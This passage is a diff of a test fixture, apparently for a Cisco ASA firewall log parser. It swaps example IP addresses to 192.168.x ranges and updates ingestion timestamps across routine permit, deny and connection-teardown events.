@@ -1166,8 +1166,8 @@ }, "source": { "port": 12981, - "address": "192.0.0.66", - "ip": "192.0.0.66" + "address": "192.168.0.66", + "ip": "192.168.0.66" }, "tags": [ "preserve_original_event" @@ -1189,14 +1189,14 @@ }, "related": { "ip": [ - "192.0.0.66", + "192.168.0.66", "10.1.2.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.672428567Z", - "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query", + "ingested": "2021-12-09T13:32:11.535026900Z", + "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -1219,8 +1219,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2006, @@ -1256,13 +1256,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672430273Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535031200Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1289,8 +1289,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49734, @@ -1326,13 +1326,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672432095Z", - "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535035200Z", + "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1359,8 +1359,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49735, @@ -1396,13 +1396,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672433901Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535039700Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1429,8 +1429,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49736, @@ -1466,13 +1466,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672435687Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535045400Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1499,8 +1499,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49737, @@ -1536,13 +1536,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672437410Z", - "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535049400Z", + "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1569,8 +1569,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49738, @@ -1606,13 +1606,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672439163Z", - "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535053900Z", + "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1639,8 +1639,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49746, @@ -1676,13 +1676,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672441057Z", - "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535058800Z", + "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1709,8 +1709,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2007, @@ -1746,13 +1746,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672442981Z", - "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535063200Z", + "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672444700Z", + "ingested": "2021-12-09T13:32:11.535067400Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1849,8 +1849,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2008, @@ -1886,13 +1886,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672686227Z", - "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535071Z", + "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -1924,8 +1924,8 @@ }, "source": { "port": 137, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -1951,14 +1951,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.2.42" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.672694181Z", - "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside", + "ingested": "2021-12-09T13:32:11.535075400Z", + "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", "action": "firewall-rule", @@ -1988,8 +1988,8 @@ }, "source": { "port": 12981, - "address": "192.0.2.66", - "ip": "192.0.2.66" + "address": "192.168.2.66", + "ip": "192.168.2.66" }, "tags": [ "preserve_original_event" @@ -2011,14 +2011,14 @@ }, "related": { "ip": [ - "192.0.2.66", + "192.168.2.66", "10.1.5.60" ] }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.672696392Z", - "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query", + "ingested": "2021-12-09T13:32:11.535081200Z", + "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", "action": "firewall-rule", @@ -2041,8 +2041,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2009, @@ -2078,13 +2078,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672698183Z", - "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535087900Z", + "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2111,8 +2111,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49776, @@ -2148,13 +2148,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672699982Z", - "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535093200Z", + "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2181,8 +2181,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2010, @@ -2218,13 +2218,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672701734Z", - "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535099Z", + "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2251,8 +2251,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2011, @@ -2288,13 +2288,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672703527Z", - "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535104800Z", + "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2321,8 +2321,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2012, @@ -2358,13 +2358,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672705277Z", - "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535110600Z", + "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2396,8 +2396,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2427,14 +2427,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672707494Z", - "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:32:11.535116400Z", + "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2466,8 +2466,8 @@ }, "source": { "port": 53638, - "address": "192.0.2.126", - "ip": "192.0.2.126" + "address": "192.168.2.126", + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" @@ -2497,14 +2497,14 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.0.0.132" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.672709522Z", - "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", + "ingested": "2021-12-09T13:32:11.535122100Z", + "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2531,8 +2531,8 @@ }, "destination": { "port": 40443, - "address": "192.0.0.88", - "ip": "192.0.0.88" + "address": "192.168.0.88", + "ip": "192.168.0.88" }, "source": { "port": 49840, @@ -2568,13 +2568,13 @@ "related": { "ip": [ "10.0.0.46", - "192.0.0.88" + "192.168.0.88" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672711305Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535127900Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2601,8 +2601,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2013, @@ -2638,13 +2638,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.672717900Z", - "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535133600Z", + "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2671,8 +2671,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.99", - "ip": "192.0.0.99" + "address": "192.168.0.99", + "ip": "192.168.0.99" }, "source": { "port": 2241, @@ -2708,13 +2708,13 @@ "related": { "ip": [ "10.0.0.16", - "192.0.0.99" + "192.168.0.99" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673302991Z", - "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:32:11.535139200Z", + "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673308988Z", + "ingested": "2021-12-09T13:32:11.535144900Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2821,8 +2821,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2858,13 +2858,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673311212Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:32:11.535150500Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2894,8 +2894,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5555, @@ -2931,13 +2931,13 @@ "related": { "ip": [ "192.168.1.33", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673313288Z", - "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", + "ingested": "2021-12-09T13:32:11.535156800Z", + "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -2972,8 +2972,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3007,13 +3007,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673315096Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:32:11.535162600Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3029,7 +3029,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3050,8 +3050,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3085,13 +3085,13 @@ "OCSP_Server" ], "ip": [ - "192.0.2.222" + "192.168.2.222" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673316830Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", + "ingested": "2021-12-09T13:32:11.535168700Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3107,7 +3107,7 @@ "mapped_destination_host": "OCSP_Server", "destination_interface": "dmz", "mapped_source_port": 1234, - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447236", "source_interface": "outside", "mapped_destination_port": 5678 @@ -3128,8 +3128,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3160,7 +3160,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3168,8 +3168,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673318546Z", - "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "ingested": "2021-12-09T13:32:11.535173800Z", + "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:01:31.000Z", @@ -3205,8 +3205,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3237,7 +3237,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3245,8 +3245,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673320261Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:32:11.535178600Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3282,8 +3282,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3314,7 +3314,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3322,8 +3322,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673321982Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:32:11.535184800Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3359,8 +3359,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3385,14 +3385,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673324042Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:32:11.535189900Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3425,8 +3425,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3451,14 +3451,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673325801Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:32:11.535193800Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3486,8 +3486,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3523,13 +3523,13 @@ "related": { "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673327545Z", - "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst 